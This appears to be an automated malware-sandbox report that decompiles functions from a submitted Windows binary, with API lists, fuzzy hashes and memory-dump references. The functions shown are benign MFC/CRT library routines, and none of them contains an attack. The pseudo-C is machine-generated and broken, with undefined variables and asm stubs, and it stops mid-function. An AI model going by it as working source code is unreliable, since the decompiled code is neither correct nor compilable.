                  • Opcode ID: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction ID: 41b635fbd72690f6c41e90ba14f5db02281b1f503569879f63f8d22cb9e6b9e6
                  • Opcode Fuzzy Hash: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction Fuzzy Hash: 75E086B27011245BC7206B6EFC8474AA26CEBC0361F57417BD94143261F3BD4840CEDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424341, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424341(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t5;

				_t5 = __eax;
				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
			}




                  0x00424341
                  0x00424346

                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction ID: 362583a6ec685c06e829ffb7026d3f7272e8230db339484b57aec9b72c79060d
                  • Opcode Fuzzy Hash: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction Fuzzy Hash: 50E0CDE2B452251BC7206A6EFCC464E6A5CDFC036071745BBD881D3111F3AD9840C5DF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041443A, Relevance: 6.2, APIs: 4, Instructions: 180COMMON
                  Download Yara Rule
                  C-Code - Quality: 40%
                  			E0041443A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				RECT* _v292;
				struct tagRECT _v308;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed char _t65;
				signed int _t70;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t113;
				signed int _t115;
				intOrPtr _t133;
				RECT* _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t140;
				signed int _t145;
				void* _t146;

				_t133 = __edx;
				_t109 = __ecx;
				_t143 = _t145;
				_t146 = _t145 - 0x130;
				_t58 =  *0x463404; // 0x18eab29f
				_v8 = _t58 ^ _t145;
				_t139 = _a4;
				_t135 = _a8;
				_t107 = __ecx;
				_v288 = _t139;
				_v292 = _t135;
				_t149 = __ecx;
				if(__ecx == 0) {
					L2:
					E00406436(_t107, _t109, _t135, _t139, _t149);
				}
				if(_t139 == 0) {
					goto L2;
				}
				_t62 = GetWindowRect( *(_t139 + 0x20),  &_v308);
				if( *((intOrPtr*)(_t139 + 0x90)) != _t107 || _t135 != 0 && EqualRect( &_v308, _t135) == 0) {
					if( *((intOrPtr*)(_t107 + 0x98)) != 0 && ( *(_t139 + 0x88) & 0x00000040) != 0) {
						 *(_t107 + 0x84) =  *(_t107 + 0x84) | 0x00000040;
					}
					 *(_t107 + 0x84) =  *(_t107 + 0x84) & 0xfffffff9;
					_t65 =  *(_t139 + 0x84) & 0x00000006 |  *(_t107 + 0x84);
					 *(_t107 + 0x84) = _t65;
					_t157 = _t65 & 0x00000040;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v268);
						E00412D87(_t107, _t139, _t133, _t135, _t139, _t157);
						E0041FC5A(_t139, _t133,  *((intOrPtr*)(_t107 + 0x20)),  &_v268);
					}
					_t70 = ( *(_t139 + 0x84) ^  *(_t107 + 0x84)) & 0x0000f000 ^  *(_t139 + 0x84) | 0x00000f00;
					if( *((intOrPtr*)(_t107 + 0x98)) == 0) {
						_t71 = _t70 & 0xfffffffe;
						__eflags = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E00420D66(_t139, _t71);
					_t136 = E004135F7(_t107, GetDlgCtrlID( *(_t139 + 0x20)), 0xffffffff);
					if(_t136 > 0) {
						 *((intOrPtr*)(E0040B917(_t107 + 0x9c, _t136))) = _t139;
					}
					if(_v292 == 0) {
						__eflags = _t136 - 1;
						if(_t136 < 1) {
							_t136 = _t107 + 0x9c;
							E004133A2(_t107 + 0x9c, _t139);
							E004133A2(_t107 + 0x9c, 0);
						}
						_t113 =  *0x466524; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t113);
						_t115 =  *0x466520; // 0x2
						_push( ~_t115);
						_push(0);
					} else {
						E00413342( &_v284, _v292);
						E00422BFB(_t107,  &_v284);
						if(_t136 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v272 - _v280 - _t133 >> 1) + _v280);
							_push((_v276 - _v284 - _t133 >> 1) + _v284);
							_t136 = _t146 - 0x10;
							_push(_v288);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0041365C(_t107);
							_t139 = _v288;
						}
						_push(0x114);
						_push(_v272 - _v280);
						_push(_v276 - _v284);
						_push(_v280);
						_push(_v284);
						_push(0);
					}
					E00412D05(_t139);
					if(E0040EE3C(_t107, _t139, GetParent( *(_t139 + 0x20))) != _t107) {
						E004133D6(_t139, _t107);
					}
					_t118 =  *((intOrPtr*)(_t139 + 0x90));
					if( *((intOrPtr*)(_t139 + 0x90)) != 0) {
						E00413A2C(_t118, _t136, _t139, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t139 + 0x90)) = _t107;
					 *(E00408487(_t107) + 0xe4) =  *(_t62 + 0xe4) | 0x0000000c;
				}
				_pop(_t137);
				_pop(_t140);
				_pop(_t108);
				return E00430650(_t62, _t108, _v8 ^ _t143, _t133, _t137, _t140);
			}






























                  0x0041443a
                  0x0041443a
                  0x0041443d
                  0x0041443f
                  0x00414445
                  0x0041444c
                  0x00414451
                  0x00414455
                  0x00414458
                  0x0041445a
                  0x00414460
                  0x00414466
                  0x00414468
                  0x0041446a
                  0x0041446a
                  0x0041446a
                  0x00414471
                  0x00000000
                  0x00000000
                  0x0041447d
                  0x00414489
                  0x004144b0
                  0x004144bb
                  0x004144bb
                  0x004144c2
                  0x004144d8
                  0x004144da
                  0x004144e0
                  0x004144e2
                  0x004144e4
                  0x004144ef
                  0x004144f2
                  0x00414501
                  0x00414501
                  0x0041451d
                  0x00414529
                  0x00414530
                  0x00414530
                  0x0041452b
                  0x0041452b
                  0x0041452b
                  0x00414536
                  0x0041454e
                  0x00414552
                  0x00414560
                  0x00414560
                  0x00414569
                  0x00414616
                  0x00414619
                  0x0041461b
                  0x00414624
                  0x0041462d
                  0x0041462d
                  0x00414632
                  0x00414638
                  0x0041463d
                  0x0041463f
                  0x00414640
                  0x00414643
                  0x00414644
                  0x0041464c
                  0x0041464d
                  0x0041456f
                  0x0041457b
                  0x00414589
                  0x00414591
                  0x004145a5
                  0x004145be
                  0x004145c9
                  0x004145ca
                  0x004145ce
                  0x004145d0
                  0x004145d6
                  0x004145d7
                  0x004145d8
                  0x004145db
                  0x004145dc
                  0x004145e1
                  0x004145e1
                  0x004145f3
                  0x004145f8
                  0x00414605
                  0x00414606
                  0x0041460c
                  0x00414612
                  0x00414612
                  0x00414650
                  0x00414666
                  0x0041466b
                  0x0041466b
                  0x00414670
                  0x00414678
                  0x0041467f
                  0x0041467f
                  0x00414686
                  0x00414691
                  0x00414691
                  0x0041469b
                  0x0041469c
                  0x0041469f
                  0x004146a6

                  APIs
                  • GetWindowRect.USER32 ref: 0041447D
                  • EqualRect.USER32 ref: 0041449B
                  • GetDlgCtrlID.USER32 ref: 00414540
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 00414658
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ParentRectWindow$CtrlEqualException@8H_prolog3Throw
                  • String ID:
                  • API String ID: 295898562-0
                  • Opcode ID: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction ID: ba48c219f6f1ad370f563cc23c44ecb0e53aac9f91ee0a06091b5b2abe8ce970
                  • Opcode Fuzzy Hash: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction Fuzzy Hash: 0F61D5716001199FCB24DF29CD42BEA77B5BF85304F0401AEEA5ED7291DF789E818B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004482FB, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004482FB(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t54;
				void* _t58;
				intOrPtr _t61;
				signed int _t67;
				void* _t106;
				void* _t130;

				_t123 = __edi;
				_t122 = __edx;
				_t95 = __ebx;
				_push(0x58);
				E00431B04(E0044CB8F, __ebx, __edi, __esi);
				_t129 = __ecx;
				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
					_t52 =  *(_t129 + 0x4c);
					__eflags = _t52;
					if(_t52 != 0) {
						__eflags =  *(_t129 + 0x3c);
						if(__eflags != 0) {
							E00447F37(_t130 - 0x2c);
							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
							while(1) {
								_push( *(_t129 + 0x4c));
								_t54 = E004499A8(_t95, _t122, _t123, _t129, __eflags);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								E00448268(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
								_t58 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x44));
								_t95 = _t58;
								_t61 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x64));
								_t122 =  *( *(_t129 + 0x3c));
								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
								__eflags = _t67;
								if(_t67 < 0) {
									break;
								} else {
									_t123 = 1;
									__eflags = _t67 - 1;
									if(_t67 <= 1) {
										_t106 = _t130 - 0x2c;
										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E0044794F(E0044818F(_t106, _t130 - 0x54));
											while(1) {
												__eflags = _t123;
												if(_t123 <= 0) {
													goto L23;
												}
												_push( *(_t129 + 0x4c));
												_t123 = _t123 - 1;
												__eflags = _t123;
												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
												E00442D62(_t95, _t122, _t123, _t129, _t123);
											}
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c));
											E004020E0(_t130 - 0x2c, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c)));
											continue;
										}
									} else {
										__eflags = _t67 - 3;
										if(_t67 != 3) {
											break;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
											if(__eflags < 0) {
												continue;
											} else {
												E0043065F(_t95, _t83, _t130 - 0x2d, 1, E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x4c)), 1);
												L23:
												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
											}
										}
									}
								}
								L19:
								E00402090(_t130 - 0x2c, _t130, 1, 0);
								goto L3;
							}
							__eflags = _t129;
							goto L19;
						} else {
							_t52 = E00447F77(__eflags, _t130 - 0x2d, _t52);
							__eflags = _t52;
							if(_t52 == 0) {
								goto L5;
							} else {
							}
						}
					} else {
						L5:
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
					_t129 =  *(__ecx + 0x20);
					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
				}
				L3:
				return E00431B87(_t95, _t123, _t129);
			}










                  0x004482fb
                  0x004482fb
                  0x004482fb
                  0x004482fb
                  0x00448302
                  0x00448307
                  0x00448310
                  0x0044833a
                  0x0044833d
                  0x0044833f
                  0x00448346
                  0x0044834a
                  0x00448365
                  0x0044836a
                  0x00448435
                  0x00448435
                  0x00448438
                  0x0044843e
                  0x00448441
                  0x00000000
                  0x00000000
                  0x00448379
                  0x0044838c
                  0x00448394
                  0x004483a4
                  0x004483ac
                  0x004483ae
                  0x004483c1
                  0x004483cb
                  0x004483ce
                  0x004483d0
                  0x00000000
                  0x004483d2
                  0x004483d4
                  0x004483d5
                  0x004483d7
                  0x0044840d
                  0x00448410
                  0x00448413
                  0x00448473
                  0x0044848a
                  0x0044848a
                  0x0044848c
                  0x00000000
                  0x00000000
                  0x0044847a
                  0x0044847d
                  0x0044847d
                  0x00448482
                  0x00448483
                  0x00448489
                  0x00000000
                  0x00448415
                  0x00448428
                  0x00448430
                  0x00000000
                  0x00448430
                  0x004483d9
                  0x004483d9
                  0x004483dc
                  0x00000000
                  0x004483de
                  0x004483de
                  0x004483e1
                  0x00000000
                  0x004483e3
                  0x004483fd
                  0x0044848e
                  0x0044848e
                  0x0044848e
                  0x004483e1
                  0x004483dc
                  0x004483d7
                  0x0044844a
                  0x00448451
                  0x00000000
                  0x00448456
                  0x00448447
                  0x00000000
                  0x0044834c
                  0x00448351
                  0x00448358
                  0x0044835a
                  0x00000000
                  0x0044835c
                  0x0044835c
                  0x0044835a
                  0x00448341
                  0x00448341
                  0x00448341
                  0x00448322
                  0x00448325
                  0x00448327
                  0x0044832f
                  0x00448331
                  0x00448334
                  0x00448339

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00448302
                  • _fgetc.LIBCMT ref: 00448438
                    • Part of subcall function 00448268: std::_String_base::_Xlen.LIBCPMT ref: 0044827E
                  • _memcpy_s.LIBCMT ref: 004483FD
                  • _ungetc.LIBCMT ref: 00448483
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                  • String ID:
                  • API String ID: 9762108-0
                  • Opcode ID: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction ID: 6b1c3ca6e5d9ee48176232dde700f32502ceeb77f090096f39552806af3b4032
                  • Opcode Fuzzy Hash: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction Fuzzy Hash: 1351B1729046099FEB14EFB5C8529EEB3B9AF08314B50451FE452E7291EF38E905CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042E41C, Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0042E41C(void* __ebx, void* __ecx, void* __eflags, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				char _v20;
				struct _FILETIME _v28;
				struct _FILETIME _v36;
				char _v44;
				void* __edi;
				void* __esi;
				void* _t56;
				signed int* _t60;
				signed int* _t82;
				signed int* _t85;
				signed int* _t88;
				struct _FILETIME* _t94;
				void* _t106;
				CHAR* _t107;
				signed int* _t108;
				void* _t112;

				_t91 = __ecx;
				_t108 = _a4;
				_t106 = __ecx;
				E00431160(__ecx, _t108, 0, 0x128);
				E004048ED(__ebx, _t91, _t106, _t108,  &(_t108[8]), 0x104,  *(_t106 + 0xc), 0xffffffff);
				_t56 =  *(_t106 + 4);
				_t112 = _t56 -  *0x4542f8; // 0xffffffff
				if(_t112 == 0) {
					L20:
					return 1;
				}
				_t94 =  &_v20;
				if(GetFileTime(_t56, _t94,  &_v28,  &_v36) != 0) {
					_t60 =  &_v12;
					__imp__GetFileSizeEx( *(_t106 + 4), _t60);
					if(_t60 == 0) {
						goto L2;
					}
					_t108[6] = _v12;
					_t108[7] = _v8;
					_t107 =  *(_t106 + 0xc);
					if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
						_t108[8] = (_t94 & 0xffffff00 | GetFileAttributesA(_t107) == 0xffffffff) - 0x00000001 & _t64;
					} else {
						_t108[8] = 0;
					}
					if(E0042DF81( &_v20) == 0) {
						 *_t108 =  *_t108 & 0x00000000;
						_t108[1] = _t108[1] & 0x00000000;
					} else {
						_t88 = E0042E0A4( &_v44,  &_v20, 0xffffffff);
						 *_t108 =  *_t88;
						_t108[1] = _t88[1];
					}
					if(E0042DF81( &_v28) == 0) {
						_t108[4] = 0;
						_t108[5] = 0;
					} else {
						_t85 = E0042E0A4( &_v44,  &_v28, 0xffffffff);
						_t108[4] =  *_t85;
						_t108[5] = _t85[1];
					}
					if(E0042DF81( &_v36) == 0) {
						_t108[2] = 0;
						_t108[3] = 0;
					} else {
						_t82 = E0042E0A4( &_v44,  &_v36, 0xffffffff);
						_t108[2] =  *_t82;
						_t108[3] = _t82[1];
					}
					if(( *_t108 | _t108[1]) == 0) {
						 *_t108 = _t108[2];
						_t108[1] = _t108[3];
					}
					if((_t108[4] | _t108[5]) == 0) {
						_t108[4] = _t108[2];
						_t108[5] = _t108[3];
					}
					goto L20;
				}
				L2:
				return 0;
			}





















                  0x0042e41c
                  0x0042e425
                  0x0042e431
                  0x0042e433
                  0x0042e446
                  0x0042e44b
                  0x0042e451
                  0x0042e457
                  0x0042e573
                  0x00000000
                  0x0042e575
                  0x0042e465
                  0x0042e472
                  0x0042e47b
                  0x0042e482
                  0x0042e48a
                  0x00000000
                  0x00000000
                  0x0042e48f
                  0x0042e495
                  0x0042e498
                  0x0042e49f
                  0x0042e4b8
                  0x0042e4a1
                  0x0042e4a1
                  0x0042e4a1
                  0x0042e4c6
                  0x0042e4e2
                  0x0042e4e5
                  0x0042e4c8
                  0x0042e4d1
                  0x0042e4d8
                  0x0042e4dd
                  0x0042e4dd
                  0x0042e4f4
                  0x0042e515
                  0x0042e518
                  0x0042e4f6
                  0x0042e4ff
                  0x0042e506
                  0x0042e50c
                  0x0042e50c
                  0x0042e526
                  0x0042e547
                  0x0042e54a
                  0x0042e528
                  0x0042e531
                  0x0042e538
                  0x0042e53e
                  0x0042e53e
                  0x0042e552
                  0x0042e557
                  0x0042e55c
                  0x0042e55c
                  0x0042e565
                  0x0042e56a
                  0x0042e570
                  0x0042e570
                  0x00000000
                  0x0042e565
                  0x0042e474
                  0x00000000

                  APIs
                  • _memset.LIBCMT ref: 0042E433
                    • Part of subcall function 004048ED: __cftof.LIBCMT ref: 004048FE
                  • GetFileTime.KERNEL32(?,?,?,?), ref: 0042E46A
                  • GetFileSizeEx.KERNEL32(?,?), ref: 0042E482
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: File$SizeTime__cftof_memset
                  • String ID:
                  • API String ID: 2749391713-0
                  • Opcode ID: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction ID: 59e65bddb89cb08a79970d6891d001c7148b8aeecaf6f385f6588ba968201997
                  • Opcode Fuzzy Hash: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction Fuzzy Hash: 5D517071A00615AFCB20DF66D840D9BB7F4BF08324B448A2EE5A6D3690E734E545CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C15A, Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041C15A(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t71;
				intOrPtr _t78;
				intOrPtr* _t81;
				signed short _t100;
				void* _t109;
				signed int _t112;
				int* _t113;
				void* _t117;

				_t117 = __ecx;
				_push(0);
				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
					_t62 =  *((intOrPtr*)(__ecx + 0xb0));
					_t112 = _a4 * 0x28;
					 *(__ecx + 0x118) = 1;
					 *((intOrPtr*)(_t62 + 0x20)) =  *((intOrPtr*)(_t62 + _t112 + 0x20));
					 *((intOrPtr*)(_t62 + 0x24)) =  *((intOrPtr*)(_t62 + _t112 + 0x24));
					_t63 =  *((intOrPtr*)(__ecx + 0xb0));
					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + _t112 + 0x10));
					 *((intOrPtr*)(_t63 + 0x14)) =  *((intOrPtr*)(_t63 + _t112 + 0x14));
					_push( *((intOrPtr*)(__ecx + 0x114)) + _a4);
					E0041BAC8(__ecx);
					E0041B7FA(__ecx, __eflags, 0);
					_t113 = _t112 +  *((intOrPtr*)(_t117 + 0xb0)) + 0x18;
					_a8 = MulDiv(_a8,  *_t113, _t113[1]);
					_a12 = MulDiv(_a12,  *_t113, _t113[1]);
					_t71 =  *((intOrPtr*)(_t117 + 0xb0));
					_a12 = _a12 +  *((intOrPtr*)(_t71 + 4));
					_t59 =  &_a8;
					 *_t59 = _a8 +  *_t71;
					__eflags =  *_t59;
					return E004195B7(_t117, _t109, _a8, _a12);
				}
				 *(__ecx + 0x118) =  *(__ecx + 0x108);
				ShowScrollBar( *(__ecx + 0x20), 0, ??);
				_t78 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x134)))) + 0x74));
				_t100 =  *(_t78 + 0x1e) & 0x0000ffff;
				if(_t100 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t117 + 0x20), 1, _a4);
					if(_a4 != 0) {
						_t81 =  *((intOrPtr*)(_t117 + 0x134));
						_v28 = 3;
						_v24 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1e) & 0x0000ffff;
						_v16 = 1;
						if(E0040CE62(_t117, 1,  &_v32, 0) == 0) {
							E0040DAD4(_t117, 1, _v24, _v20, 0);
						}
					}
					return E0041BAC8(_t117,  *((intOrPtr*)(_t117 + 0x114)), 1);
				}
				_a4 = 1;
				if((_t100 & 0x0000ffff) - ( *(_t78 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}


















                  0x0041c166
                  0x0041c169
                  0x0041c170
                  0x0041c233
                  0x0041c239
                  0x0041c23c
                  0x0041c24a
                  0x0041c251
                  0x0041c254
                  0x0041c25e
                  0x0041c265
                  0x0041c273
                  0x0041c274
                  0x0041c27c
                  0x0041c28d
                  0x0041c29b
                  0x0041c2a8
                  0x0041c2ab
                  0x0041c2b6
                  0x0041c2bc
                  0x0041c2bc
                  0x0041c2bc
                  0x00000000
                  0x0041c2c4
                  0x0041c186
                  0x0041c18c
                  0x0041c196
                  0x0041c199
                  0x0041c1a5
                  0x0041c1bf
                  0x0041c1bf
                  0x0041c1c2
                  0x0041c1ca
                  0x0041c1cf
                  0x0041c1d1
                  0x0041c1d7
                  0x0041c1e7
                  0x0041c1f3
                  0x0041c201
                  0x0041c20b
                  0x0041c217
                  0x0041c217
                  0x0041c20b
                  0x00000000
                  0x0041c226
                  0x0041c1b0
                  0x0041c1bd
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • ShowScrollBar.USER32(?,00000000,00000000), ref: 0041C18C
                  • ShowScrollBar.USER32(?,00000001,?), ref: 0041C1CA
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C299
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C2A6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ScrollShow
                  • String ID:
                  • API String ID: 3611344627-0
                  • Opcode ID: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction ID: bf8b80c232955c01bad76bb884e3b34b9d27a71a0442df1df84a360057f59a7a
                  • Opcode Fuzzy Hash: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction Fuzzy Hash: CF416674600604AFCB15DF69C880AAABBF6FF48304F00456EF85A9B361D774E990DF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004425DA, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004425DA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00430D81( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004403C3( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00431D3E(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
